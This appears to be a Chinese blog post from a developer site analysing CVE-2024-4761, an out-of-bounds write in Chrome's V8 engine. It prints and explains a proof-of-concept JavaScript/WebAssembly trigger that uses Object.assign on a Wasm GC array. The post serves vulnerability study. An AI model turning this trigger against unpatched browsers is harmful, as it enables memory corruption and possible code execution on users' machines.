CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

分析 CVE-2024-4761 和 POC 代码

CVE-2024-4761 描述

CVE-2024-4761 是一个在 V8 引擎中发现的越界写漏洞,报告日期为 2024-05-09。这个漏洞可能允许攻击者通过特制的代码执行任意代码或者造成内存破坏,进而导致程序崩溃或其他不安全行为。

POC 代码解析
const prefix = "...";

d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);

let builder = new WasmModuleBuilder();

let array = builder.addArray(kWasmI32, true);

builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
  .addBody([
    kExprLocalGet, 0,
    kGCPrefix, kExprArrayNewDefault, array,
    kGCPrefix, kExprExternConvertAny,
  ])
  .exportFunc();

let instance = builder.instantiate({});
let wasm = instance.exports;

let array42 = wasm.createArray(42);

let src = {};
src.a = 1;
delete src.a;

for (let i = 0; i < 1024; i++) {
  src[`p${i}`] = 1;
}

Object.assign(array42, src);

在这里插入图片描述

代码分析
  1. 加载 wasm-module-builder.js 模块

    d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
    

    这里假设 D8(V8 引擎的调试工具)正在执行一段 JavaScript 代码,该代码加载了 WebAssembly 模块构建器脚本。

  2. 构建 WebAssembly 模块

    let builder = new WasmModuleBuilder();
    let array = builder.addArray(kWasmI32, true);
    

    使用 WasmModuleBuilder 创建一个新的 WebAssembly 模块,并定义一个整数数组类型。

  3. 添加和导出一个函数

    builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
      .addBody([
        kExprLocalGet, 0,
        kGCPrefix, kExprArrayNewDefault, array,
        kGCPrefix, kExprExternConvertAny,
      ])
      .exportFunc();
    

    这个函数 createArray 接受一个整数参数,创建一个新的 WebAssembly 数组并返回一个外部引用。函数体包含指令序列来获取局部变量,创建默认的数组,并将其转换为外部引用。

  4. 实例化模块并调用导出函数

    let instance = builder.instantiate({});
    let wasm = instance.exports;
    let array42 = wasm.createArray(42);
    

    实例化模块后,调用 createArray 函数,创建一个包含 42 个元素的数组。

  5. 构建和修改对象

    let src = {};
    src.a = 1;
    delete src.a;
    for (let i = 0; i < 1024; i++) {
      src[`p${i}`] = 1;
    }
    Object.assign(array42, src);
    

    创建一个对象 src,并在其中动态添加属性。最后,使用 Object.assignsrc 的属性赋值给 array42

漏洞利用可能性

此代码通过 Object.assign 将一个具有大量属性的对象赋值给一个 WebAssembly 数组,这种操作在 V8 引擎内部可能导致内存管理或边界检查失效,进而触发越界写漏洞。具体表现可能包括覆盖数组边界以外的内存区域,从而执行任意代码或导致程序崩溃。

结论

从代码来看,这段 POC 似乎旨在触发 V8 引擎中的越界写漏洞。通过构建一个包含大量属性的对象并将其分配给 WebAssembly 数组,可以测试 V8 的内存边界检查是否有缺陷。如果存在缺陷,该操作可能会导致越界写,从而验证 CVE-2024-4761 漏洞的真实性。因此,POC 代码看起来是合理且可能真实的漏洞利用示例。

  • 7
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

David_Jou

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值